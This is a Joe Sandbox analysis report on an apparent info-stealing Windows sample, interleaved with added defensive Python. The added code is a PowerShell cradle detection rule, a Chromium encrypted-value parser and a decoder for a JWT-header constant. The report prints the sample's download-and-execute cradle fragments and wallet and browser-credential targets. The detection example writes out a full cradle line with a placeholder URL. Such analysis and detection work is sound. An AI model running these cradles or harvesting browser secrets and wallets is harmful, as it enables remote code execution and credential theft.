                              • lstrcat.KERNEL32(?,00000000), ref: 00654147
                              • lstrcat.KERNEL32(?,013DE730), ref: 0065415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 3acfd72201a8aa09e46a95188d1413ce5b80352a608a13bfdfb2e6582c277900
                              • Instruction ID: 26a2769b6812c0ce872c77ce3ab19c52a0e8a42ce59838f2c67d9ace79865a47
                              • Opcode Fuzzy Hash: 3acfd72201a8aa09e46a95188d1413ce5b80352a608a13bfdfb2e6582c277900
                              • Instruction Fuzzy Hash: DE4199B6910108ABDB18EBA4DC56FFE737DBB48300F00455DB616571C1EA755B8C8BA2
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                              • LocalFree.KERNEL32(0064148F), ref: 00649A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 15618e0a4ac4ca70a33cdd8850a6152d7cd63aabdad008ed0b7a942869f58137
                              • Instruction ID: f5bb278fe94bbe14ee03086e7f1e8b4b5b19328bf0430c493b7141e1491d57c8
                              • Opcode Fuzzy Hash: 15618e0a4ac4ca70a33cdd8850a6152d7cd63aabdad008ed0b7a942869f58137
                              • Instruction Fuzzy Hash: EC3129B4A40209EFDB14DF94C885BEE77B6FF48301F108158E911A7390D779AA81CFA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 598039bae654077f05d4b1906643227b709290de06dc972db60ae187d4561bcf
                              • Instruction ID: 6d97aad5b9031d2625dcd09a061ca2218dd1144537c6acc24b0c9d14747ca227
                              • Opcode Fuzzy Hash: 598039bae654077f05d4b1906643227b709290de06dc972db60ae187d4561bcf
                              • Instruction Fuzzy Hash: 0A4104B110079C5EDB218B248C84FFBBBFAAF45715F1444ECED8A86182D2719A49DF64
                              APIs
                              • lstrcat.KERNEL32(?,013DE658), ref: 006547DB
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00654801
                              • lstrcat.KERNEL32(?,?), ref: 00654820
                              • lstrcat.KERNEL32(?,?), ref: 00654834
                              • lstrcat.KERNEL32(?,013CA710), ref: 00654847
                              • lstrcat.KERNEL32(?,?), ref: 0065485B
                              • lstrcat.KERNEL32(?,013DDC78), ref: 0065486F
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 00658D90: GetFileAttributesA.KERNEL32(00000000,?,00641B54,?,?,0066564C,?,?,00660E1F), ref: 00658D9F
                                • Part of subcall function 00654570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00654580
                                • Part of subcall function 00654570: RtlAllocateHeap.NTDLL(00000000), ref: 00654587
                                • Part of subcall function 00654570: wsprintfA.USER32 ref: 006545A6
                                • Part of subcall function 00654570: FindFirstFileA.KERNEL32(?,?), ref: 006545BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 33394e8d349052598ab01ecc8c15f13d21bbb0ce9398977df2f4c6e7974d1f5b
                              • Instruction ID: 9dd8ac484fba2400d6af6390adcdfb6261652275b612eb1f80c30d4e6ee80b14
                              • Opcode Fuzzy Hash: 33394e8d349052598ab01ecc8c15f13d21bbb0ce9398977df2f4c6e7974d1f5b
                              • Instruction Fuzzy Hash: A6319FB2900208ABDB54FBB4DC85EE9737DBB48300F40459DB719A6081EE74978DCBA9
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00652D85
                              Strings
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00652D04
                              • <, xrefs: 00652D39
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00652CC4
                              • ')", xrefs: 00652CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 63977348a7cc3f69dda78625b354438eb468cbfba78457972feb39cd34a09b73
                              • Instruction ID: 25fd6c0a8c6d0932d5e0b4a816e6846b460db7b4b8d5c49aaa1637fd6bc80696
                              • Opcode Fuzzy Hash: 63977348a7cc3f69dda78625b354438eb468cbfba78457972feb39cd34a09b73
                              • Instruction Fuzzy Hash: 8141BD71C102089ADB58EFE0C892BEDBB76BF14301F40422DE916A7191EF756A4ECF95
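The function above assembles `powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"` from the three string fragments and hands it to ShellExecuteEx. The detection logic below is an added example, not code from the report or from the sample: it reads Sysmon-style process-creation events and flags exactly that cradle (iex plus Net.WebClient.DownloadString in one PowerShell command line), scoring the extra tells the report exposes: the hardcoded SysWOW64 path (32-bit PowerShell host), the profile suppressed with -nop, and a parent that is not an interactive shell. The log lines are constructed; the parent path under Temp, the user name and the URL are placeholders, not values from the report.

```python
"""Flag the PowerShell download cradle the report recovers from this sample
(powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')")
in process-creation telemetry. Added example, not part of the Joe Sandbox report."""
import json
import re

# Constructed Sysmon Event ID 1 records, one JSON object per line. Only the
# PowerShell path and the cradle syntax come from the report's strings; the
# parent image path, the user name and the URL are placeholders.
SAMPLE_LOG = r'''
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe C:\\Users\\user\\notes.txt"}
{"EventID":1,"Image":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Users\\user\\AppData\\Local\\Temp\\XDPT5mgIBO.exe","CommandLine":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -nop -c \"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\""}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"}
'''

POWERSHELL_IMAGE = re.compile(r"\\powershell\.exe$", re.IGNORECASE)
WOW64_IMAGE = re.compile(r"\\SysWOW64\\", re.IGNORECASE)
INVOKE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
WEBCLIENT = re.compile(r"new-object\s+(system\.)?net\.webclient", re.IGNORECASE)
# Captures the first argument of DownloadString( ... ), quoted or not.
DOWNLOAD = re.compile(r"\.downloadstring\s*\(\s*['\"]?([^'\")]*)", re.IGNORECASE)
NOPROFILE = re.compile(r"(^|\s)-nop(rofile)?\b", re.IGNORECASE)
# Parents from which an operator might legitimately launch PowerShell by hand.
INTERACTIVE_PARENT = re.compile(r"\\(explorer|cmd|powershell|pwsh|wscript|cscript)\.exe$", re.IGNORECASE)


def classify(event: dict):
    """Return an alert dict for a download cradle launched in powershell.exe, else None."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    if not POWERSHELL_IMAGE.search(image):
        return None
    download = DOWNLOAD.search(cmd)
    # All three parts must be present: evaluate + web client + string download.
    if not (INVOKE.search(cmd) and WEBCLIENT.search(cmd) and download):
        return None
    reasons = ["iex + Net.WebClient.DownloadString in one command line"]
    if NOPROFILE.search(cmd):
        reasons.append("profile suppressed (-nop)")
    if WOW64_IMAGE.search(image):
        reasons.append("32-bit PowerShell host (SysWOW64 path)")
    parent = event.get("ParentImage", "")
    if not INTERACTIVE_PARENT.search(parent):
        reasons.append("non-interactive parent: " + parent)
    return {"parent": parent, "url": download.group(1), "reasons": reasons}


def scan(log_text: str) -> list:
    """Parse one JSON event per line and collect the alerts."""
    alerts = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        alert = classify(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["parent"], "->", alert["url"])
        for reason in alert["reasons"]:
            print("   ", reason)
```

The third record (an operator running a script with -NoProfile) is deliberately not flagged: the rule keys on the combination of an in-memory evaluate and a network fetch, not on -nop alone.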
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00649F41
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 2f68b934bb88489955f7041d8671b1d7a51f49eeb8b3b5ee44a61ab1bb236d92
                              • Instruction ID: 9c88cdf2289fb8a6153f6d255c55141f75bf2e0c981d8700d6f9446de6995b69
                              • Opcode Fuzzy Hash: 2f68b934bb88489955f7041d8671b1d7a51f49eeb8b3b5ee44a61ab1bb236d92
                              • Instruction Fuzzy Hash: CF614070A10248EBDB14EFE4CD96FEE777AAF45304F008118F90A5F191EB746A4ACB56
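The strings "v10" and "v20" in the function above are the version prefixes Chromium puts on values protected by its os_crypt layer: "v10" values are AES-256-GCM under the DPAPI-wrapped key stored in Local State, "v20" values use the App-Bound Encryption key. The report itself does not say what this function does with them, so the following is an added example, not the sample's code: a parser for those layouts that splits a value into nonce, ciphertext and tag and recognises a legacy raw DPAPI blob by its header. The blobs it runs on are constructed, not taken from a real profile, and no decryption is attempted.

```python
"""Lay out the Chromium os_crypt value formats whose version tags ("v10", "v20")
appear as strings in the function at 00649F41. Added example, not the sample's
own code; the blobs below are constructed, not taken from a real browser profile."""

# DPAPI blob header: version 1 followed by the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian byte order.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
NONCE_LEN = 12   # AES-256-GCM nonce length Chromium uses for v10/v20 values
TAG_LEN = 16     # GCM authentication tag appended after the ciphertext


def parse_chromium_value(blob: bytes) -> dict:
    """Classify an os_crypt-protected value and split out its fields.

    v10:   "v10" || nonce(12) || ciphertext || tag(16); the key is the
           DPAPI-wrapped os_crypt.encrypted_key in the profile's Local State.
    v20:   same layout; the key is the App-Bound Encryption key instead.
    dpapi: a legacy value that is a raw DPAPI blob (pre-v10 profiles).
    """
    if blob.startswith(DPAPI_HEADER):
        return {"scheme": "dpapi", "blob": blob}
    prefix = blob[:3]
    if prefix not in (b"v10", b"v20"):
        raise ValueError("unknown value prefix %r" % prefix)
    if len(blob) < 3 + NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short for %s layout" % prefix.decode())
    body = blob[3:]
    return {
        "scheme": prefix.decode(),
        "nonce": body[:NONCE_LEN],
        "ciphertext": body[NONCE_LEN:-TAG_LEN],
        "tag": body[-TAG_LEN:],
        "key_source": ("Local State os_crypt.encrypted_key (DPAPI)"
                       if prefix == b"v10" else "App-Bound Encryption key"),
    }


def build_value(nonce: bytes, ciphertext: bytes, tag: bytes, version: bytes = b"v10") -> bytes:
    """Assemble a blob in the v10/v20 layout (used here only to construct test input)."""
    if len(nonce) != NONCE_LEN or len(tag) != TAG_LEN:
        raise ValueError("nonce must be 12 bytes and tag 16 bytes")
    return version + nonce + ciphertext + tag


# Constructed sample values (deterministic so the results can be checked).
SAMPLE_V10 = build_value(bytes(range(12)), b"\xaa" * 20, b"\xbb" * 16)
SAMPLE_V20 = build_value(bytes(range(12)), b"\xcc" * 5, b"\xdd" * 16, b"v20")
SAMPLE_DPAPI = DPAPI_HEADER + b"\x00" * 8

if __name__ == "__main__":
    for sample in (SAMPLE_V10, SAMPLE_V20, SAMPLE_DPAPI):
        fields = parse_chromium_value(sample)
        print(fields["scheme"], fields.get("key_source", "raw DPAPI"))
```

The practical point for triage: a v10 value cannot be recovered without the Local State key, and a v20 value not even with it, which is why a stealer that handles both needs a second component beyond plain DPAPI calls.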
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • memset.MSVCRT ref: 0065716A
                              Strings
                              • se, xrefs: 006572AE, 00657179, 0065717C
                              • se, xrefs: 00657111
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0065718C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemset
                              • String ID: se$se$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 4047604823-3776805429
                              • Opcode ID: 7bfa5b057b428917d151e0fde2c9b7a9d64cdd1e42a8bff5c806f988811fb4f8
                              • Instruction ID: 7fa19fdeb50f3b23be41cef036ec6c4535372e794b04b572c6aa3bcf513908d1
                              • Opcode Fuzzy Hash: 7bfa5b057b428917d151e0fde2c9b7a9d64cdd1e42a8bff5c806f988811fb4f8
                              • Instruction Fuzzy Hash: 6D518FB0C042089BDB64EB90DC85BEEB376AF04306F1441ACE90677281EB742E8CCF58
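The 43-byte constant the report lists as a hex dump at 0065718C is not opaque: the bytes are printable ASCII, that ASCII is unpadded base64, and the base64 decodes to the JSON `{ "typ": "JWT", "alg": "EdDSA" }`, i.e. a JWT header. The report does not say what the sample does with it, so the decoder below is an added example (not the sample's code) that peels those two layers off the constant copied from the report and reports at which layer a candidate string stops decoding, which is the check to run on any similar constant before guessing its purpose.

```python
"""Decode the hex-dump constant the report lists at 0065718C. Added example;
it shows what the bytes encode, the report does not say how the sample uses them."""
import base64
import binascii
import json

# Copied verbatim from the report's Strings entry for the function at 0065716A.
HEX_CONSTANT = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
    "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump into raw bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def b64_decode_unpadded(text: str) -> bytes:
    """Decode base64 that was stored without '=' padding, as binaries often do."""
    padded = text + "=" * (-len(text) % 4)
    return base64.b64decode(padded, validate=True)


def decode_constant(dump: str = HEX_CONSTANT) -> dict:
    """Peel the layers: hex -> ASCII -> base64 -> JSON. Each field is None past
    the first layer that fails, so the result says how far the decode got."""
    result = {"ascii": None, "base64_decoded": None, "json": None}
    raw = hex_dump_to_bytes(dump)
    try:
        result["ascii"] = raw.decode("ascii")
    except UnicodeDecodeError:
        return result
    try:
        inner = b64_decode_unpadded(result["ascii"])
    except (binascii.Error, ValueError):
        return result
    result["base64_decoded"] = inner.decode("utf-8", "replace")
    try:
        result["json"] = json.loads(inner)
    except ValueError:
        pass
    return result


if __name__ == "__main__":
    for layer, value in decode_constant().items():
        print("%-15s %r" % (layer, value))
```

`decode_constant` also works as a negative check: a constant that is real ciphertext rather than encoded text will fail at the ASCII or base64 layer and come back with those fields set to None instead of raising.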
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00657E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,013CBBE8,00000000,00020119,?), ref: 00657E5E
                              • RegQueryValueExA.ADVAPI32(?,013DDDB8,00000000,00000000,000000FF,000000FF), ref: 00657E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00657E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
